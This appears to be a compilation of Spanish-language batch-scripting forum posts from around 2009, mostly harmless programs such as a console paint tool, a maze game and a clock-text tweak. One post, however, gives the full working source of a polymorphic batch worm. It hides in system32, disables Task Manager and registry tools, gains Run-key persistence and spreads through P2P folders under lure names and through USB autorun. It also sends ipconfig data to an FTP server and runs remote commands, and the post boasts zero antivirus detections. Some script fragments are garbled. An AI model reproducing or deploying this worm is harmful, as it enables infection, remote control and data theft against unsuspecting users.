[bat][vbs][deb] Batch Paint

Quien dijo que no se podia pintar en Batch?? :S

@Echo Off
@title Batch Paint
@Mode Con cols=80 lines=25
Setlocal Enabledelayedexpansion

::A Program by S.C.O.T 2009
::Script Coders Oriented Team
::SmartGenius & 3D1

If Not Exist Col.vbs (Call :Col_Deb >>Col.vbs)
Set "X=0"
Set "Y=0"
Set "Color=11"
Set "Pincel=Û"
Call :Load

If "!X!-!Y!"=="43-2" (Exit)
For /l %%s in (33,1,39) do (If "!X!-!Y!"=="%%s-2" (Goto :Save))
If "!X!-!Y!"=="22-2" (Set "Pincel=°")
If "!X!-!Y!"=="24-2" (Set "Pincel=±")
If "!X!-!Y!"=="26-2" (Set "Pincel=²")
If "!X!-!Y!"=="28-2" (Set "Pincel=Û")
If "!X!-!Y!"=="3-4" (Set "Color=01")
If "!X!-!Y!"=="5-4" (Set "Color=02")
If "!X!-!Y!"=="7-4" (Set "Color=03")
If "!X!-!Y!"=="3-6" (Set "Color=04")
If "!X!-!Y!"=="5-6" (Set "Color=05")
If "!X!-!Y!"=="7-6" (Set "Color=06")
If "!X!-!Y!"=="3-8" (Set "Color=07")
If "!X!-!Y!"=="5-8" (Set "Color=08")
If "!X!-!Y!"=="7-8" (Set "Color=09")
If "!X!-!Y!"=="3-10" (Set "Color=0A")
If "!X!-!Y!"=="5-10" (Set "Color=0B")
If "!X!-!Y!"=="7-10" (Set "Color=0C")
If "!X!-!Y!"=="3-12" (Set "Color=0D")
If "!X!-!Y!"=="5-12" (Set "Color=0E")
If "!X!-!Y!"=="7-12" (Set "Color=0F")
If !X! GEQ 12 (
If !Y! GEQ 5 (
If !X! LEQ 41 (
If !Y! LEQ 15 (
cscript //nologo col.vbs "!X!" "!Y!" "%Color%" "%Pincel%"
Set /a "vX=!X!-12"
Set /a "vY=!Y!-5"
Set "X!vX!Y!vY!=!vX! !vY! %Color% %Pincel%"
Call :Mouse
Goto :Table

Echo. ³Colores³ Pinceles ° ± ² Û ³Guardar³ ³X³
Echo. ³ÃÄÅÄÅÄ´³ º º ³
Echo. ³³Û³Û³Û³³ º º ³
Echo. ³ÃÄÅÄÅÄ´³ º º ³
Echo. ³³Û³Û³Û³³ º º ³
Echo. ³ÃÄÅÄÅÄ´³ º º ³
Echo. ³³Û³Û³Û³³ º º ³
Echo. ³ÃÄÅÄÅÄ´³ º º ³
Echo. ³³Û³Û³Û³³ º º ³
Echo. ³ÀÄÁÄÁÄÙ³ º º ³
Echo. ÃÄÄÄÄÄÄÄ´ º º ³
Echo. ³ SCOT ³ º º ³
cscript //nologo col.vbs "3" "4" "11" " "
cscript //nologo col.vbs "5" "4" "22" " "
cscript //nologo col.vbs "7" "4" "33" " "
cscript //nologo col.vbs "3" "6" "44" " "
cscript //nologo col.vbs "5" "6" "55" " "
cscript //nologo col.vbs "7" "6" "66" " "
cscript //nologo col.vbs "3" "8" "77" " "
cscript //nologo col.vbs "5" "8" "88" " "
cscript //nologo col.vbs "7" "8" "99" " "
cscript //nologo col.vbs "3" "10" "AA" " "
cscript //nologo col.vbs "5" "10" "BB" " "
cscript //nologo col.vbs "7" "10" "CC" " "
cscript //nologo col.vbs "3" "12" "DD" " "
cscript //nologo col.vbs "5" "12" "EE" " "
cscript //nologo col.vbs "7" "12" "FF" " "
Goto :Eof

Echo e100 B8 1 0'3'DB CD'3'B0 3'C'CD'3'B DB't'FA 91 D3 EA D3 E8 91 C3>mouse.dat
For %%! in (.g116 .q) do (Echo%%!>> mouse.dat)
For /f "tokens=6-8 delims== " %%a in ('Debug ^< x="0x%%a" y="0x%%c" v=" Introduzca">> ">%Filename%
For /l %%a in (0,1,29) do (
For /l %%b in (0,1,11) do (
If Defined X%%aY%%b (Echo.Cscript //nologo col.vbs !X%%aY%%b! >>%Filename%)
Echo.Pause^>nul >>%Filename%
Call :Col_Deb Echo. "^">>%Filename%
Echo. Archivo %Filename% Generado Exitosamente
Ren %Filename% %Filename%.bat >nul
Set /p "V= Presione Cualquier tecla para volver...."nul
Goto :Init

Echo. @Echo off
Echo. @Title Paint Batch - %Filename%
Echo. @Mode Con Cols=80 Lines=25
Echo. @::Hecho Con Batch Paint
Echo. @::S.C.O.T Team 2009
Echo.If Not Exist Col.vbs Call :Col ^>^>col.vbs
Goto :Eof

%1Echo.On Error Resume Next
%1Echo.HexColor = Right("0" %~2^& wscript.arguments(2), 2)
%1Echo.Set oExec = CreateObject("WScript.Shell").Exec("%comspec% /c debug ")
%1Echo.Do Until oExec.StdOut.Read(1) = "-"
%1Echo. wsh.sleep 10
%1Echo.Dim Textos
%1Echo.Textos = Replace(wscript.arguments(3), Chr(195), "Û")
%1Echo.WriteXY wscript.arguments(0), wscript.arguments(1), HexColor, Textos
%1Echo.oExec.StdIn.Writeline "e0:451 2A"
%1Echo.oExec.StdIn.Writeline "q"
%1Echo.Sub WriteXY(X, Y, hColor, sText)
%1Echo.Dim ColorText
%1Echo. For j = 1 to Len(sText) Step 10
%1Echo. ColorText = "EB800:" %~2^& Hex(Y * 160 + (X + j - 1) * 2)
%1Echo. For i = j to j + 9
%1Echo. ColorText = ColorText %~2^& " " %~2^& Hex(Asc(Mid(sText, i, 1))) %~2^& " " %~2^& hColor
%1Echo. if i = Len(sText) Then Exit For
%1Echo. Next
%1Echo. oExec.StdIn.Writeline ColorText
%1Echo. Next
%1Echo.End Sub
%1Attrib +H Col.vbs
%1Goto :Eof
Goto :Eof

[Aplicacion] ASCIIC - by xassiz

ASCIIC - by xassiz

Bueno, os dejo esta aplicacion que acabo de programar en VBScript xDD

Pasa una cadena a ASCII y además tiene la opción de copiar el resultado al portapapeles.. =)

Esta perfecto para convertir las tablas en una inyección SQL.

Descarga Aqui

Pass: xassiz09

Espero que os guste =D


[Troyano Parasitario] 1l1l3l5.a

Bueno, como sabeis, Batch No tiene Limites!!

Ejecutando comandos remotamente:

El troyano al infectar una maquina envia al servidor FTP un archivo del formato:
conteniendo la salida del comando 'ipconfig/all'.
Para ejecutar un comando el esa PC basta con crear un archivo del formato:
conteniendo el/los comandos a ejecutar, si se ejecuto correctamente, el archivo "%username%at%userdomain%_cmd.t" sera eliminado automaticamente del servidor.

:: 1l1l3l5.a // lil %ini%
:: Autor: lShadowl %ini%
:: SO Objetivo/Target OS: Windows Xp Pro %ini%
:: Propagation: P2P/rar, flash drives (it stay resident looking for new drives to infect) %ini%
:: Propagacion: P2P/rar, flash drives (queda residente en la memoria esperando que nuevos dispositivos se conecten para infectarlos) %ini%
:: Polimorfism: translocation, string morphing, 90-180 bytes added per every run %ini%
:: Polimorfismo: translocacion de codigo, mutacion de cadenas, 90-180 bytes mas cada ves que es ejecutado %ini%
:: Payload: Drops a FTP troyan that allows attacker to execute remote commands and scripts %ini%
:: Payload: Carga un troyano que le permite al atacante ejecutar comandos y scripts de manera remota via FTP %ini%
:: Fecha de creacion/Realese Date: 24/9/09 %ini%
:: Disclaimer: %ini%
:: This script contains malicious code. %ini%
:: Possessing, using, spreading, compiling and linking it, possessing, using and spreading %ini%
:: of the executable form of this script is illegal and it is forbidden in many countries. %ini%
:: Should you do such a thing, the author may not be held responsible for any damage that %ini%
:: occurred from the use of this source code. The actual purpose of this source code is for %ini%
:: educational purposes and as an object of study. This source code comes as is and the author %ini%
:: can not be held responsible for the existence of other modified variants of this code. %ini%
@%systemdrive% %ini%
@set sdjf=fictsoehnda %ini%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%
@%agnvl%mys=%windir%\system32\sysio\lil.bat %ini%
@%egnkv%off %ini%
%agnvl: =%local enabledelayedexpansion %ini%
@md %windir%\system32\sysio >nul %ini%
if not exist %mys% ( @copy /y %0 %mys% >nul %ini%
attrib +h %mys%) %ini%
call:_%1 %2 %ini%
exit %ini%
:_ %ini%
call:_h432crt perp %ini%
exit %ini%
:_mut %ini%
%fsdhf%"ini"<%mys%>%windir%\system32\sysio\$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%fsdhf%"m%r: =%"<%windir%\system32\sysio\$>nul&&(goto:tst) %ini%
%fsdhf%"m%r: =%"<%mys%>>%windir%\system32\sysio\$ %ini%
%agnvl%/a rdnmm=%random%*9999999 %ini%
%egnkv%::%rdnmm% %%m%r: =%%%>>%windir%\system32\sysio\$ %ini%
:tst %ini%
%agnvl%a=1 %ini%
for /L %%a in (0,1,9) do call:cmp %%a %ini%
%egnkv%%a%|%fsdhf: =%str /C:"o" >nul&&(goto:rnd_b) %ini%
attrib -h %mys% %ini%
type %windir%\system32\sysio\$>%mys% %ini%
ping -n 2 localhost>nul %ini%
attrib +h %mys% %ini%
del /f /q %windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%dfjalds=createobject("scripting.filesystemobject")>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%kdflekj=dfjalds.opentextfile("%mys%",1)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%askdajs=kdflekj.readall>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%kdflekj.close>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%Randomize>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%ahqiaohe=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%jdfasuu=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%dwudhqw=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%asdwdkw=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%sjdfhjs=Replace(askdajs,"sdjf",ahqiaohe)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%lasdaod=Replace(sjdfhjs,"agnvl",jdfasuu)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%skdnmxi=Replace(lasdaod,"egnkv",dwudhqw)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%sjsabwu=Replace(skdnmxi,"fsdhf",asdwdkw)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%skdjawuj=dfjalds.opentextfile("%mys%",2)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%skdjawuj.write sjsabwu>>%windir%\system32\sysio\asjdhau.vbs %ini%
start %windir%\system32\sysio\asjdhau.vbs %ini%
del /f /q %windir%\system32\sysio\h432.vbs,%windir%\system32\sysio\$&& exit %ini%
:_h432crt %m5%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL")>%windir%\system32\sysio\h432.vbs %m5%
%egnkv%xect.run "cmd /c %mys%%1", vbhide>>%windir%\system32\sysio\h432.vbs&& start %windir%\system32\sysio\h432.vbs&& goto :eof %m5%
:cmp %m7%
%fsdhf%"m%1"<%windir%\system32\sysio\$>nul %m7%
if %errorlevel%==1 (%agnvl% a=%a%o %m7%
goto:eof) %m7%
%agnvl% a=%a%x %m7%
goto :EOF %m7%
:rnd %m6%
%agnvl%/a r=%random%%%10 %m6%
goto:eof %m6%
:_perp %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntV%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\%sdjf:~6,1%xplor%sdjf:~6,1%r" /v NoFol%sdjf:~9,1%%sdjf:~6,1%rOptions /t R%sdjf:~6,1%G_%sdjf:~9,1%WOR%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntv%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\Syst%sdjf:~6,1%m" /v %sdjf:~9,1%is%sdjf:~10,1%bl%sdjf:~6,1%T%sdjf:~10,1%skMgr /t r%sdjf:~6,1%g_%sdjf:~9,1%wor%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntV%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\Syst%sdjf:~6,1%m" /v %sdjf:~9,1%is%sdjf:~10,1%bl%sdjf:~6,1%R%sdjf:~6,1%gistryTools /t r%sdjf:~6,1%g_%sdjf:~9,1%wor%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v lilUpdate /t REG_SZ /d %mys%/f %m1%
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AvUpdate /t REG_SZ /d %windir%\system32\sysio\h42.vbs /f %m1%
del /q %windir%\system32\sysio\t.rar %m1%
%systemdrive%&& set rc=1 %m1%
if exist "%programfiles%\WINRAR\WinRAR.exe" (set r="%programfiles%\WINRAR\WinRAR.exe" %m1%
%r% a -ibck -y %windir%\system32\sysio\t.rar %mys: =% %m1%
if not %errorlevel%==9009 set rc=0) %m1%
for %%a in ("%userprofile%\Configuraci¢n local\Datos de programa\Ares\My Shared Folder\" "%userprofile%\Local Settings\Application Data\Ares\My Shared Folder\" "%programfiles%\eMule\Incoming\" "%programfiles%\Shareaza\Downloads\" "%programfiles%\BearShare\Shared\" "%programfiles%\LimeWire\Shared\") do (if exist "%%a" (cd "%%a" %m1%
for %%e in (*.rar) do (type !mys: =!>"%%~ne.bat" %m1%
ping -n 2 localhost >nul&& !r! a -ibck -y "%%e" "%%~ne.bat") %m1%
for %%g in ("XXX Photos" dvdrip glee "Keygen Constructor" wii psp "Keygen ALL" fringe surrogates "Nude Celebrities" "MSN hack codes" "Password list" "Activation tool" Windows7 "Windows 7 trucos" "Windows 7 tricks" "MSN Hack Tool" Photoshop "Photoshop CS4") do (type !mys: =!>%%g.bat %m1%
if !rc!==0 (ping -n 2 localhost>nul&& !r! a -ibck -y %%g.rar %%g.bat)))) %m1%
call:_h432crt fnid&& ping -n 12 localhost>nul %m1%
call:_h432crt dinfres&& ping -n 12 localhost>nul&& set ertr=9 %m1%
%fsdhf%"m%ertr: =%"<%mys%>%windir%\system32\sysio\fet.bat %m1%
ping -n 1 www.google.com>nul&&(if not exist %username%at%userdomain%_cmd.t ( %m1%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL"^)>%windir%\system32\sysio\h42.vbs %m1%
%egnkv%xect.run "cmd /c %windir%\system32\sysio\fet.bat", vbhide>>%windir%\system32\sysio\h42.vbs %m1%
%windir%\system32\sysio\h42.vbs)) %m1%
call:_h432crt mut&& exit %m1%
:_dinfres %m2%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL")>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%%agnvl%kjslras=GetObject("winmgmts:\\.\root\cimv2").ExecNotificationQuery _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%("Select*From __InstanceOperationEvent Within 10 Where " _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%^& "TargetInstance isa 'Win32_LogicalDisk'")>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Do While True>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%%agnvl%asdaiw=kjslras.NextEvent>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%If asdaiw.TargetInstance.DriveType=2 _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Or asdaiw.TargetInstance.DriveType=3 Then>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Select Case asdaiw.Path_.Class>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Case "__InstanceCreationEvent">>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%wscript.sleep 2000>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%xect.run "cmd /c %mys%ddetc " ^& asdaiw.TargetInstance.DeviceId ^& " 1", vbhide>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%End Select>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%End If>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Loop>>%windir%\system32\sysio\ubsh.vbs %m2%
taskkill /f /im wscript.exe %m2%
start %windir%\system32\sysio\ubsh.vbs&& goto :eof %m2%
:_fnid %m4%
for %%i in (C: H: I: J: K: L: M: Z: Y: X: W: V: U: T: S: R: Q: P: O: N: G: F: E: D:) do (call:_ddetc %%i) %m4%
exit %m4%
:_ddetc %m4%
if exist %1 (fsutil fsinfo drivetype %1|findstr /C:"CD" >nul&& (>nul echo.)|| (if exist %1\%sdjf:~10,1%utorun.inf ( %m4%
for %%z in ("%1\%sdjf:~10,1%utorun.inf" "%1\lil.bat") do (%sdjf:~10,1%ttrib -h -r -s -a "%%z") %m4%
ren %1\%sdjf:~10,1%utorun.inf %random%ow.ned) %m4%
echo.exit|cmd/K prompt $_[%sdjf:~10,1%utorun]$_open=lil.bat$_shellexecute=lil.bat$_; >"%1\%sdjf:~10,1%utorun.inf" %m4%
type "%mys: =%">"%1\lil.bat" %m4%
for %%z in (%1\%sdjf:~10,1%utorun.inf %1\lil.bat %1\*.ned) do (%sdjf:~10,1%ttrib +h "%%z"))) %m4%
if %2'==' (goto:eof) else (exit) %m4%
@%systemdrive% %m9%
@set sdjf=fictsoehnda %m9%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %m9%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %m9%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %m9%
%agnvl: =%local enabledelayedexpansion %m9%
cd %windir%\system32\sysio %m9%
%agnvl%"target=%windir%\system32\sysio\" %m9%
ipconfig/all>%username%at%userdomain%_ipcfg.t %m9%
%egnkv: =%.exit|cmd/K prompt $_verbose$_open FTP.SERVER$_FTP.USER$_FTP.PASS$_cd FTP.TARGET.FOLDER$_verbose >$.t %m9%
%egnkv: =%.>mello.t&& call:r $.t exit ipcfgs.t %m9%
%egnkv: =%.exit|cmd/K prompt $_lcd "%target%"$_put %username%at%userdomain%_ipcfg.t$_ls -lF$_verbose$_quit$_rem >>ipcfgs.t %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:ipcfgs.t %m9%
%egnkv: =%.>mello.t&& call:r $.t exit mello.t %m9%
%egnkv: =%.exit|cmd/K prompt $_lcd "%target%"$_get %username%at%userdomain%_cmd.t$_ls -lF$_verbose$_quit$_rem >>mello.t %m9%
:floop %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:mello.t %m9%
if exist %username%at%userdomain%_cmd.t for /f "delims=" %%a in (%username%at%userdomain%_cmd.t) do (%agnvl%"rcmd=%%a" %m9%
if defined rcmd (cmd /c !rcmd! %m9%
if !errorlevel!==0 (%egnkv: =%.>"d.t"&& call:r $ exit "d.t" %m9%
%egnkv: =%.exit|cmd/K prompt $_delete !username!at!userdomain!_cmd.t$_ls -lF$_verbose$_quit$_rem >>"d.t" %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:"d.t">nul&& del /q !username!at!userdomain!_cmd.t))) %m9%
goto:floop %m9%
:r %m9%
for /f "tokens=1,* delims=]" %%A in ('"type %1|find /n /v """') do (%agnvl%"current=%%B" %m9%
if defined current (call %agnvl%current=!!current:%2=!!&& %egnkv%!current!>>%3) else %egnkv: =%.>>%3) %m9%
goto:eof %m9%
:: %m0%
:: %m8%

Debido a posibles problemas al postear he subido el archivo en formato .txt a 1l1l3l5.a.txt

File Info

Report generated: 28.9.2009 at 19.25.46 (GMT 1)
Filename: 1l1l3l5.a.txt
File size: 11 KB
MD5 Hash: 7ab39a5929fa5dd09b38be6bd249fd4e
SHA1 Hash: 4492A228C7D2732DCACE25B2B73F3C6EEDC896CC
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 23


a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by


Función Lenght + efecto - by xassiz

Título: Función Lenght + efecto
Temática: Strings
Autor: xassiz
Descripción: Muestra la longitud de una cadena introducida, y la muestra en vertical.
Funcionamiento: Pide una string, y llama a la etiqueta lenght para medirla con un contador. Luego crea una variable para cada caracter y los muestre verticalmente.

@echo off
title Funcion Lenght + efecto - by xassiz!
setlocal enabledelayedexpansion
(set txt=)
set/p "txt=String> "
if not defined txt (goto:main)
set/a cont=0
call :lenght
echo."%txt%" mide %cont%
for /L %%_ in (1,1,%cont%) do (echo.!let[%%_]!)
set "var=!txt:~%cont%,1!"
if not defined var (goto:eof)
set/a cont+=1
set "let[%cont%]=%var%"


String> me llamo xassiz

'se borra la pantalla

"me llamo xassiz" mide 15

'hace una pausa




[PTLR] Pon Texto al Lado del Reloj - by xassiz

Bueno, hoy os traigo este sencilla aplicacion, para poner texto al lado del reloj de Windows.

Espero que os guste! Saludos!!

@echo off
title Pon Texto al Lado del Reloj - by xassiz
color 0a
set "text="
set/p "text=Texto> "
@(reg add "HKCU\Control Panel\International" /v s1159 /t REG_SZ /d "%text%" /f
reg add "HKCU\Control Panel\International" /v s2359 /t REG_SZ /d "%text%" /f
reg add "HKCU\Control Panel\International" /v sTimeFormat /t REG_SZ /d "HH:mm:ss tt" /f
reg add "HKEY_USERS\.DEFAULT\Control Panel\International" /v s1159 /t REG_SZ /d "%text%" /f
reg add "HKEY_USERS\.DEFAULT\Control Panel\International" /v s2359 /t REG_SZ /d "%text%" /f
reg add "HKEY_USERS\.DEFAULT\Control Panel\International" /v sTimeFormat /t REG_SZ /d "HH:mm:ss tt" /f
taskkill /im explorer.exe /f || tskill explorer)>nul 2>&1
echo.msgbox"Proceso Finalizado",99,"PTLR - by xassiz">%temp%\PTLR.vbs
start %temp%\PTLR.vbs
start explorer.exe

[Batch Game] Maze Maddness - by Splendit

Bueno, os traigo un juego que se me hizo entretenido, programado en Batch.

Tienes que llegar con la pelota a la X sin caerte, facil!

@echo off
@title Maze Madness
@mode con cols=22 lines=20
::Batch Game Maze Madness
::by Splendit
::Based On SmartGenius Batch Game Logics

setlocal enabledelayedexpansion
If Not Exist Keyboard.exe (Call :Keyboard)

Set LimX=16
Set LimY=16
Set IniX=0
Set IniY=0
Set MovX=0
Set MovY=0
Set "Bound=Û"
Set "Space= "
Set "Player=O"
Set "Limit=°"
Set "Exit=X"

For /l %%a in (%IniX%,1,%LimX%) do (
For /l %%b in (%IniY%,1,%LimY%) do (
Set X%%aY%%b=%Limit%))
Call :Nivel_1
Set "X4Y6=%Player%"
Set Curpos=X4Y6
Goto :Graphic

Call :Clear
For /l %%d in (%IniX%,1,%LimY%) do (
For /l %%e in (%IniX%,1,%LimX%) do (
Set Lin_%%d=!Lin_%%d!!X%%eY%%d!))
For /l %%f in (0,1,%LimY%) do (echo. !Lin_%%f!)
If Defined MovL (
Ping -n 1 localhost >nul
Call :%MovL% "%CurPos%"
Goto :Graphic
) else (
If "%errorlevel%"=="77" (call :MovX "+" "%CurPos%")
If "%errorlevel%"=="75" (call :MovX "-" "%CurPos%")
If "%errorlevel%"=="80" (call :MovY "+" "%CurPos%")
If "%errorlevel%"=="72" (call :MovY "-" "%CurPos%")
If "%errorlevel%"=="88" (pause&exit)
If "%errorlevel%"=="120" (pause&exit)
Goto :Graphic

For /f "tokens=1,2 delims=X,Y" %%p in ("%~2") do (
if "%%q"=="%LimY%" Goto :Eof
Set /a MovY=%%q%~11
Call Set NMovY=%%X%%pY!MovY!%%
If "!NMovY!"=="%Bound%" (Set "MovL="&Goto :Eof)
If "!NMovY!"=="%Exit%" (Goto :Win)
If "!NMovY!"=="%Limit%" (Goto :Lose)
Set X%%pY!MovY!=%Player%
Set CurPos=X%%pY!MovY!
Set MovL=MovY "%~1"
Set "%~2=%Space%")
Goto :Eof

For /f "tokens=1,2 delims=X,Y" %%p in ("%~2") do (
If "%%p"=="%LimX%" Goto :Eof
Set /a MovX=%%p%~11
Call Set NMovX=%%X!MovX!Y%%q%%
If "!NMovX!"=="%Bound%" (Set "MovL="&Goto :Eof)
If "!NMovX!"=="%Exit%" (Goto :Win)
If "!NMovX!"=="%Limit%" (Goto :Lose)
Set "X!MovX!Y%%q=%Player%"
Set "CurPos=X!MovX!Y%%q"
Set MovL=MovX "%~1"
Set "%~2=%Space%")
Goto :Eof

for /l %%m in (0,1,%LimY%) do (set Lin_%%m=)
Goto :Eof

Echo. Felicitaciones
Echo. Completaste
Echo. El Nivel
Pause >nul

Echo. Has Perdido
Echo. Intenta de Nuevo
Set "MovL="
Pause >nul
Goto :Vars

For %%a in (X1Y1,X1Y2,X1Y4,X1Y7,X1Y8,X1Y11,X2Y1,X2Y14,X2Y15,X3Y1,X3Y3,X3Y5,X3Y10,X3Y12,X4Y1,X4Y7,X5Y9,X5Y10,X5Y11,X6Y5,X6Y9,X6Y11,X6Y15,X7Y1,X7Y5,X7Y11,X7Y15,X8Y3,X8Y11,X8Y15,X9Y3,X9Y7,X9Y11,X9Y15,X10Y11,X10Y15,X11Y5,X11Y10,X11Y11,X11Y15,X12Y1,X12Y2,X12Y8,X12Y13,X13Y3,X13Y6,X13Y7,X13Y8,X13Y9,X13Y13,X14Y1,X14Y15,X15Y3,X15Y4,X15Y7,X15Y11,X15Y12,X15Y14,X15Y15) do (Set %%a=%Bound%)
For %%a in (X1Y3,X1Y5,X1Y6,X1Y9,X1Y10,X1Y12,X1Y13,X1Y14,X1Y15,X2Y2,X2Y3,X2Y4,X2Y5,X2Y6,X2Y7,X2Y8,X2Y9,X2Y10,X2Y11,X2Y12,X2Y13,X3Y2,X3Y4,X3Y6,X3Y7,X3Y8,X3Y9,X3Y11,X3Y13,X3Y14,X3Y15,X4Y2,X4Y3,X4Y4,X4Y5,X4Y8,X4Y9,X4Y10,X4Y11,X4Y12,X4Y13,X4Y14,X4Y15,X5Y1,X5Y2,X5Y3,X5Y4,X5Y5,X5Y6,X5Y7,X5Y8,X5Y12,X5Y13,X5Y14,X5Y15,X6Y1,X6Y2,X6Y3,X6Y4,X6Y6,X6Y7,X6Y8,X6Y10,X6Y12,X6Y13,X6Y14,X7Y2,X7Y3,X7Y4,X7Y6,X7Y8,X7Y9,X7Y10,X7Y12,X7Y13,X7Y14,X8Y1,X8Y2,X8Y4,X8Y5,X8Y6,X8Y7,X8Y8,X8Y9,X8Y10,X8Y12,X8Y13,X8Y14,X9Y1,X9Y2,X9Y4,X9Y5,X9Y6,X9Y8,X9Y9,X9Y10,X9Y12,X9Y13,X9Y14,X10Y1,X10Y2,X10Y3,X10Y4,X10Y5,X10Y6,X10Y7,X10Y8,X10Y9,X10Y10,X10Y12,X10Y13,X10Y14,X11Y1,X11Y2,X11Y3,X11Y4,X11Y6,X11Y7,X11Y8,X11Y9,X11Y12,X11Y13,X11Y14,X12Y3,X12Y4,X12Y5,X12Y6,X12Y7,X12Y9,X12Y10,X12Y11,X12Y12,X12Y14,X12Y15,X13Y1,X13Y2,X13Y4,X13Y5,X13Y10,X13Y11,X13Y12,X13Y14,X13Y15,X14Y2,X14Y3,X14Y4,X14Y5,X14Y6,X14Y7,X14Y8,X14Y9,X14Y10,X14Y11,X14Y12,X14Y13,X14Y14,X15Y1,X15Y2,X15Y5,X15Y6,X15Y8,X15Y9,X15Y10,X15Y13) do (Set %%a=%Space%)
Set "X7Y7=%Exit%"
Goto :Eof

Echo. Cargando...
echo n keyboard.dat
echo e 0000 4D 5A 2E 00 01 00 00 00 02 00 00 10 FF FF F0 FF
echo e 0010 FE FF 00 00 00 01 F0 FF 1C 00 00 00 00 00 00 00
echo e 0020 B4 08 CD 21 3C 00 75 02 CD 21 B4 4C CD 21
echo rcx
echo 002E
echo w0
echo q
type keyboard.dat|debug>NUL 2>&1
del /f/q/a "keyboard.exe">NUL 2>&1
ren keyboard.dat "keyboard.exe"
Goto :Eof

Espero que os guste tambien :P

Saludos! With Batch, no Limits!!